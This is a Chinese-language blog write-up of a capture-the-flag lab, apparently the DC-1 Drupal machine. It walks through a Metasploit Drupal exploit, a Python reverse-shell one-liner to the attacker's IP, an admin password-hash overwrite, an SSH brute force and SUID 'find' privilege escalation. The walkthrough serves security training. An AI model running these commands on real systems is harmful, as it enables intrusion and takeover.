Loading... 靶机地址: 1. 确认靶机所在IP 使用Nmap `sudo nmap -sV 192.168.0.1/24 -O -o 1.txt` 2. 使用kali msfconsole 查找Drupal的洞 ![image.png](https://www.irohane.top/usr/uploads/2022/04/1237940588.png) 使用show option 查看选项命令 设置目标地址之后run ![image.png](https://www.irohane.top/usr/uploads/2022/04/863847.png) 可以在目录中看到有个flag1的文档 ![image.png](https://www.irohane.top/usr/uploads/2022/04/4135387048.png) flag1.txt Get到并将线索指引到CMD的config文件 ![image.png](https://www.irohane.top/usr/uploads/2022/04/795116353.png) 那我们进入站点 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2819036966.png) 在站点文件中:/var/www/sites/default/settings.php 找到falg2。把我们指引到数据库 ![image.png](https://www.irohane.top/usr/uploads/2022/04/21300035.png)··· ``` $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), ); ``` 因为mysql需要交互shell 那么就必须反弹一个。 使用靶机python 获取反弹命令窗口 nc -lvp 888 接受 ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.172",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ``` ![image.png](https://www.irohane.top/usr/uploads/2022/04/165275986.png) `mysql -u dbuser -pR0ck3t` 注意:如果mysql无回显或者反弹的信息有问题,请使用下面这句转换常规shell `python -c 'import pty;pty.spawn("/bin/bash")'` 进入数据库后发现有一张Users的表 ![image.png](https://www.irohane.top/usr/uploads/2022/04/287477552.png) 发现admin用户,我们重新生成一个admin的hash覆盖 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3892436266.png) 在www根路径下可以找到script下的hash生成。 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2165134332.png) 使用这个脚本就可以对hash重新生成。对mysql上的数据覆盖 ![image.png](https://www.irohane.top/usr/uploads/2022/04/1922150304.png) `password: helloworld hash: $S$DLSngRO2FBg903lfv9M4dmyL0YsSqzioFyuFcb7xiq9gzk.ixNkZ` 成功重置 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3750047737.png) 登录 ![image.png](https://www.irohane.top/usr/uploads/2022/04/567664231.png)![image.png](https://www.irohane.top/usr/uploads/2022/04/2839135480.png) ![image.png](https://www.irohane.top/usr/uploads/2022/04/3215036050.png) 那我们就去找shadow文件夹,发现没有权限,但是找到了falg4 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3110693478.png) 之后发现不了其他的暂时对ssh爆破入手 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3399266979.png) 喝杯茶等爆破成功 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2902454091.png) 爆破得出密码 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2200400237.png) 接下来让我们在 root下寻找flag ![image.png](https://www.irohane.top/usr/uploads/2022/04/1793579259.png) 发现没有权限 ![image.png](https://www.irohane.top/usr/uploads/2022/04/1251042395.png) 使用find / -perm -4000 2>/dev/null 获取具有SUID 标识 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3222701021.png) 使用find 进行提权 `find flag4.txt -exec "/bin/sh" \;` ![image.png](https://www.irohane.top/usr/uploads/2022/04/3192470409.png) 最后修改:2022 年 04 月 27 日 © 允许规范转载 赞 0 如果觉得我的文章对你有用,请随意赞赏